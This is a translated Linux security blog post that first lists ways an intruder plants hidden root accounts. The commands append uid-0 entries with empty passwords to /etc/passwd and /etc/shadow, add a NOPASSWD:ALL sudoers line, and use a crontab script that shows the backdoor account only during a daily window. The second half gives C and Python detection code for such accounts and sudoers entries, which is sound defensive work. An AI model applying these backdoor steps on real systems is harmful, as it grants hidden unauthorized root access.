Catalog
1. Linux hacker account attack vectors
2. Linux suspicious account detection model

1. Linux hacker account attack vectors
0x1: Add a hacker account to the "root" group
1. useradd hacker -p hacker123
2. usermod -a -G root hacker
3. id hacker
0x2: Add a system account without using the system commands (edit /etc/passwd and /etc/shadow by hand)
1. vim /etc/passwd, append a line: musicyxy:x:0:0::/:/bin/bash
2. vim /etc/shadow, append a line: musicyxy::13407:0:99999:7::: then save and quit with :wq!
0x3: Account hiding based on crontab
1. Use crontab (scheduled tasks) to hide the hacker account.
2. Keep the forged passwd and shadow files used to hide the hacker account somewhere else (such as /tmp/passwd and /tmp/shadow); the originals (/etc/passwd, /etc/shadow) stay unchanged.
3. Append the two entries musicyxy:x:0:0::/:/bin/sh and musicyxy::13407:0:99999:7::: to the forged passwd and shadow files.
4. At a fixed time each day, swap the forged passwd and shadow files into /etc/ (after backing up the normal originals), and restore the normal originals once the time window has passed.
5. Implemented as a shell script:
```bash
#!/bin/bash
# daily at 11:40: stash the real passwd/shadow, then append the backdoor entries
echo '40 11 * * * cat /etc/passwd > /dev/ttypwd' >> /etc/door.cron
echo '40 11 * * * cat /etc/shadow > /dev/ttysdw' >> /etc/door.cron
echo '40 11 * * * echo "musicyxy:x:0:0::/:/bin/sh" >> /etc/passwd' >> /etc/door.cron
echo '40 11 * * * echo "musicyxy::9999:0:99999:7:::" >> /etc/shadow' >> /etc/door.cron
# daily at 12:09: roll the original passwd/shadow back
echo '9 12 * * * cat /dev/ttypwd > /etc/passwd' >> /etc/door.cron
echo '9 12 * * * cat /dev/ttysdw > /etc/shadow' >> /etc/door.cron
echo '10 12 * * * rm -f /dev/ttypwd' >> /etc/door.cron
echo '10 12 * * * rm -f /dev/ttysdw' >> /etc/door.cron
service crond restart
crontab /etc/door.cron
```
In this way, the backdoor account exists each day only inside the 11:40~12:09 time window.
0x4: Add a non-root account with uid=0
1. Add a normal user: useradd hacker -p hacker123 (the newly created user gets a home directory /home/hacker)
2. rm -rf /home/hacker
3. In /etc/passwd, change the new user's uid and gid to 0:
   hacker:x:501:501::/home/hacker:/bin/bash -> hacker:x:0:0::/home/hacker:/bin/bash
   or useradd -u
0x5: Hide a high-privilege account via the sudo configuration
Regardless of where the sudoers file is located, sudo provides a command for editing it: visudo. It checks that the configuration is syntactically valid and, if it is not, prompts you about the error when you save and exit.
<user list> <host list> <operator list> <tag list> <command list>    // e.g. hacker ALL=(ALL) NOPASSWD:ALL
1. User list: users or groups, or a previously defined user alias; a user is written as the bare username, a group is prefixed with %, e.g. %admin
2. Host list: hostnames or a host alias
3. Operator list: the runas user, i.e. with which user's (and group's) permissions the commands may be executed
4. Tag list: tags such as NOPASSWD in the example above
5. Command list: the commands, or command alias, that may be executed
Attack method
1. vim /etc/sudoers
2. Add one line: hacker ALL=(ALL) NOPASSWD:ALL
3. sudo -u root /mnt/sudodir/cmd now runs without a password prompt
4. The hacker user can thus switch to any user and execute arbitrary commands.
Relevant Link:
http://read.newbooks.com.cn/info/156976.html
http://www.linux521.com/2009/system/201005/11198.html
https://linux.cn/article-2655-1.html
http://chenall.net/post/linux-sudo-config/
2. Linux suspicious account detection model
0x1: Detect non-root users in the root user group
1. Via a bash command, cut -d: -f1 /etc/passwd, get the current account list.
2. Iterate over the list and call getpwnam() and getgrgid() to obtain pw_name, pw_uid and pw_gid for each account.
3. Detect abnormal accounts:
   1) a non-root account whose uid is 0
   2) a non-root account whose gid is 0
   3) a non-root account whose shell is /bin/bash or /bin/sh (rather than /sbin/nologin)
Code example:
```cpp
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <grp.h>
#include <pwd.h>
#include <unistd.h>
#include <sys/types.h>

/* Look up one account by name and print its passwd and primary-group details. */
void GetUserInfo(const char *name)
{
    struct passwd *pw;
    struct group *grp;

    if (name == NULL) {
        return;
    }
    /* getpwnam()/getgrgid() return pointers to static storage: no malloc, no free */
    pw = getpwnam(name);
    if (!pw) {
        printf("couldn't find out about user %s, %d.\n", name, errno);
        return;
    }
    printf("User login name is %s.\n", pw->pw_name);
    printf("User uid is %d.\n", (int) pw->pw_uid);
    printf("User gid is %d.\n", (int) pw->pw_gid);
    printf("User home directory is %s.\n", pw->pw_dir);
    printf("User default shell is %s.\n", pw->pw_shell);

    /* Group info */
    grp = getgrgid(pw->pw_gid);
    if (!grp) {
        printf("couldn't find out about group %d.\n", (int) pw->pw_gid);
        return;
    }
    printf("User default group is %s (%d).\n", grp->gr_name, (int) pw->pw_gid);
}

int main(void)
{
    FILE *fp = popen("cut -d: -f1 /etc/passwd", "r");
    char line[1024];

    if (fp == NULL) {
        return 0;
    }
    while (fgets(line, sizeof line, fp) != NULL) {
        line[strcspn(line, "\n")] = '\0';   /* strip the newline, or getpwnam() finds nothing */
        GetUserInfo(line);
    }
    pclose(fp);
    return 0;
}
// g++ healthchecker.cpp -o healthchecker
```
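The same three checks run over passwd text instead of live getpwnam() lookups, as an added example that is not part of the original post; the sample records are constructed, and the last two mirror the backdoor entries from the attack section:

```python
# Added example, not code from the original post: the detection model's passwd
# checks over /etc/passwd-style text. Records are constructed; the last two
# mirror the backdoor entries shown in the attack section.
LOGIN_SHELLS = {"/bin/bash", "/bin/sh"}
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hacker:x:0:0::/home/hacker:/bin/bash
musicyxy:x:0:0::/:/bin/bash
"""

def parse_passwd(text):
    """Split passwd text into records; malformed lines are kept and marked."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        try:
            if len(fields) != 7:
                raise ValueError("expected 7 fields")
            name, _, uid, gid, _, home, shell = fields
            records.append({"line": lineno, "name": name, "uid": int(uid),
                            "gid": int(gid), "home": home, "shell": shell})
        except ValueError as exc:  # also catches a non-numeric uid/gid
            records.append({"line": lineno, "error": str(exc)})
    return records

def find_suspicious(text):
    """{account: [reasons]} for non-root records that trip a check; uid/gid 0 on a
    non-root name are strong indicators, an interactive shell alone is weak (ordinary
    users trip it too) and is best read against a whitelist of interactive accounts."""
    findings = {}
    for rec in parse_passwd(text):
        if "error" in rec:
            findings["line %d" % rec["line"]] = ["malformed record: " + rec["error"]]
            continue
        if rec["name"] == "root":
            continue
        reasons = []
        if rec["uid"] == 0:
            reasons.append("uid 0 on non-root name")
        if rec["gid"] == 0:
            reasons.append("gid 0 on non-root name")
        if rec["shell"] in LOGIN_SHELLS:
            reasons.append("interactive shell " + rec["shell"])
        if reasons:
            findings[rec["name"]] = reasons
    return findings
```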
Relevant Link:
http://blog.csdn.net/xocoder/article/details/8987135
http://pubs.opengroup.org/onlinepubs/009695399/basedefs/pwd.h.html
https://www.mkssoftware.com/docs/man5/struct_group.5.asp
http://www.embedu.org/column/Column185.htm
http://www.cnblogs.com/hnrainll/archive/2011/05/07/2039692.html
0x2: /etc/sudoers anomalous configuration detection
1. Open /etc/sudoers.
2. Recursively handle the #include / #includedir directives.
3. Flag any configuration other than "root ALL=(ALL) ALL".
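The three steps above as an added example that is not part of the original post: it walks a sudoers file, follows #include / #includedir (and the @include spelling of newer sudo versions), and reports every user specification other than the baseline named above. The files are a constructed dict standing in for the filesystem, and treating "root ALL=(ALL:ALL) ALL" as an equivalent baseline is an assumption of this example.

```python
# Added example, not code from the original post: walks a sudoers file, follows
# #include / #includedir (and newer sudo's @include spelling) and reports every
# user specification other than the post's baseline "root ALL=(ALL) ALL".
import posixpath
import re

BASELINE = {"root ALL=(ALL) ALL", "root ALL=(ALL:ALL) ALL"}  # (ALL:ALL) form assumed equivalent
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

FAKE_FS = {  # constructed stand-in for the filesystem so the check runs offline
    "/etc/sudoers": "Defaults env_reset\nroot ALL=(ALL) ALL\n"
                    "%admin ALL=(ALL) ALL\n#includedir /etc/sudoers.d\n",
    "/etc/sudoers.d/10-backup": "backup ALL=(root) NOPASSWD: /usr/bin/rsync\n",
    "/etc/sudoers.d/hacker": "hacker ALL=(ALL) NOPASSWD:ALL\n",
    "/etc/sudoers.d/old.bak~": "ignored ALL=(ALL) ALL\n",  # sudo skips '.' / '~' names
}

def list_dir(fs, directory):
    """Entries sudo would read from an includedir: no '.' in the name, no trailing '~'."""
    prefix = directory.rstrip("/") + "/"
    names = [p[len(prefix):] for p in fs if p.startswith(prefix)]
    return sorted(n for n in names if "/" not in n and "." not in n and not n.endswith("~"))

def audit_sudoers(fs, path="/etc/sudoers", seen=None):
    """Return [(file, lineno, spec, reason)] for every non-baseline user spec."""
    seen = set() if seen is None else seen
    if path in seen or path not in fs:  # guards include loops and dangling includes
        return []
    seen.add(path)
    findings = []
    for lineno, raw in enumerate(fs[path].splitlines(), 1):
        line = " ".join(raw.split())  # normalise whitespace before comparing
        if not line:
            continue
        inc = re.match(r"[#@]include(dir)? (\S+)$", line)
        if inc:  # '#include' is a directive, not a comment
            target = inc.group(2)
            subs = [posixpath.join(target, n) for n in list_dir(fs, target)] if inc.group(1) else [target]
            for sub in subs:
                findings += audit_sudoers(fs, sub, seen)
            continue
        if line.startswith("#") or line.startswith(SKIP_PREFIXES) or line in BASELINE:
            continue
        reasons = []
        if not line.startswith("root "):
            reasons.append("grant to a non-root principal")
        if "NOPASSWD:" in line:
            reasons.append("NOPASSWD tag")
        findings.append((path, lineno, line, "; ".join(reasons) or "non-baseline root entry"))
    return findings
```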
Copyright (c) Littlehann All rights reserved